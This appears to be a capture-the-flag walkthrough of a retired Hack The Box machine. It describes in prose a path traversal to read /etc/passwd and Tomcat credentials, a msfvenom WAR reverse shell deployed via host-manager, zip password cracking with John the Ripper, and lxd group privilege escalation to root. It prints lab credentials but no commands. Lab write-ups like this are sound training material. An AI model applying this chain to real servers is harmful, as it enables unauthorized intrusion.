Recently retired machine, fits under OSCP like machines list. Quite similar to another HTB machine Jerry. Better exploitation in privilege escalation part.
Nmap scan with default scripts for version scan leads us to following open ports.
Port 80 HTTP Enumeration
Got nothing much in nikto, gobuster and other few scans. Visiting to page at port 80 we see interesting lines at bottom
This takes us to page: http://megahosting.htb/news.php?file=statement ; ///Add megahosting.htb to hosts file on your system, else you won’t be able to access it.
So we may try here something like Path traversal. We will use common file like /etc/passwd.
Great!!!!! Users on system found : — — users : ash
Port 8080 Tomcat Enumeration
Visiting the page at port 8080 takes us to
So we can see here 3 links
- Tomcat docs
- Examples to see source code and run them
- Admin pages
- Manager -GUI = manager webapp
- Admin-GUI = host-manager webapp
Default tomcat home page : /var/lib/tomcat9/webapps/ROOT/index.html
- CATALINA_HOME in /usr/share/tomcat9
- CATALINA_BASE in /var/lib/tomcat9
- Rules in /usr/share/doc/tomcat9-common/RUNNING.txt.gz.
- Users in /etc/tomcat9/tomcat-users.xml
- Visiting manager webapp: It asks for authentication and when it fails, it shows us following error page
Here it states that , username and password is found in page
- Similarly in host webapps, you get the same authentication error
- Checking in Tomcat docs
- Based on this our file path should be
After a lots of enumeration and finally a hint, I came to conclusion package is installed in /etc/tomcat-users.xml
Thus path will be
- On burp capturing the request on repeater and sending it shows as follows
- Username : Tomcat
Password : $3cureP4s5w0rd123!
Now this could take us to admin webpages. Fortunately it opens host-manager web app page
- Now we need to upload something, might be a war file. For this , usually a manager has permission for direct upload. But since we are not manager, we need to deploy it manually. Let’s check the way to do so
Uploading war file
- Create msfvenom payload in war file
- Now we will send a crafted request to server
It will give error two or three times, but will give shell
User Enumeration Completed. We have user tomcat, and need ash.
For enumeration I ran linPEAS.sh; found a file /var/www/html/files/16162020_backup.zip. Tried to access it by ash, but it is password protected.
So we will crack it using John The Ripper. to do this just transfer file to your local machine using netcat
Then, using john > zip2john
After we get ash.hashes , we will crack it using rockyou and john
Username : ash, Password : admin@it
Ash is member of group
So we can exploit lxd for privilege escalation
- On your machine :
- On target machine Ash Home directory. I recommend resetting the machine before doing this because some else might have done the same steps and a fingerprint of alpine- package may already exist.
Keep all default settings as shown
Eureka !! We got root.